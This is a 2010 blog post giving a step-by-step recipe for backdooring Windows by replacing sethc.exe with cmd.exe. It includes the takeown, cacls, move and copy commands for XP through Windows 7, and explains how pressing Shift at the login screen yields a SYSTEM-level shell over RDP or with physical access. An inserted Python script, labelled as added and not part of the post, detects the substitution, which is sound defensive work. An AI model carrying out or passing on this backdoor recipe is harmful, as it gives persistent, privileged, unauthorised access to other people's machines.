0x0Lab Blog Just another damn blog

12 Mar 2010

Windows simple backdooring

I remember reading about this ages ago, and a couple of weeks ago I decided to give it a try.
I was amazed to see not only that this works, but that it even works on Windows 7. Granted, you do need some extra steps to make this happen in the latter.

What I'm talking about is a very simple way to backdoor a Windows system.

To backdoor the system you will need Administrator access to it. For WinXP/2000/2003 you need to do the following. Start cmd.exe and:
> move c:\windows\system32\sethc.exe c:\windows\system32\sethc_old.exe
> copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

In Win7 you need a few extra steps (system32 is finally not world writable). Run cmd.exe as administrator and:
> takeown /f c:\windows\system32\sethc.exe
> cacls c:\windows\system32\sethc.exe /G user:F
> move c:\windows\system32\sethc.exe c:\windows\system32\sethc_old.exe
> copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

That's it. You've successfully backdoored the system.
All that is required to access the backdoor is RDP or physical access to the system.
When the login window appears, press Shift a few times so that your modified sethc.exe is executed. As an added bonus, the command prompt that appears runs with 'nt authority\system' permissions.
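A defender-side check for the substitution described above, added here as an example and not part of the original post: it hashes sethc.exe and cmd.exe in a given System32 directory, reports them if they are byte-identical, and also reports the leftover sethc_old.exe that the "move" step leaves behind. The directory argument is an assumption; point it at a live System32 or a mounted disk image.

```python
import hashlib
import sys
from pathlib import Path

# Names used by the technique above: the Sticky Keys helper, the command
# interpreter it gets replaced with, and the renamed original it leaves behind.
ACCESSIBILITY_BINARY = "sethc.exe"
CMD_BINARY = "cmd.exe"
RENAMED_ORIGINAL = "sethc_old.exe"


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_sethc(system32):
    """Return a list of findings (empty list means nothing suspicious)."""
    system32 = Path(system32)
    findings = []
    sethc = system32 / ACCESSIBILITY_BINARY
    cmd = system32 / CMD_BINARY
    # The backdoor copies cmd.exe over sethc.exe, so the two files end up identical.
    if sethc.is_file() and cmd.is_file() and sha256_of(sethc) == sha256_of(cmd):
        findings.append(f"{ACCESSIBILITY_BINARY} is byte-identical to {CMD_BINARY}")
    # The recipe renames rather than deletes the original, which is an easy tell.
    if (system32 / RENAMED_ORIGINAL).exists():
        findings.append(f"renamed original present: {RENAMED_ORIGINAL}")
    return findings


if __name__ == "__main__":
    # Default path is an assumption; pass a directory to check something else.
    target = sys.argv[1] if len(sys.argv) > 1 else r"C:\Windows\System32"
    for line in check_sethc(target) or ["no sethc.exe substitution detected"]:
        print(line)
```

A hash match against cmd.exe is the specific sign of this recipe; a more general baseline check would compare sethc.exe against the hash of a known-good copy from installation media.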

Posted by cirrus

Comments (1) Trackbacks (0)
  1. Impressive!
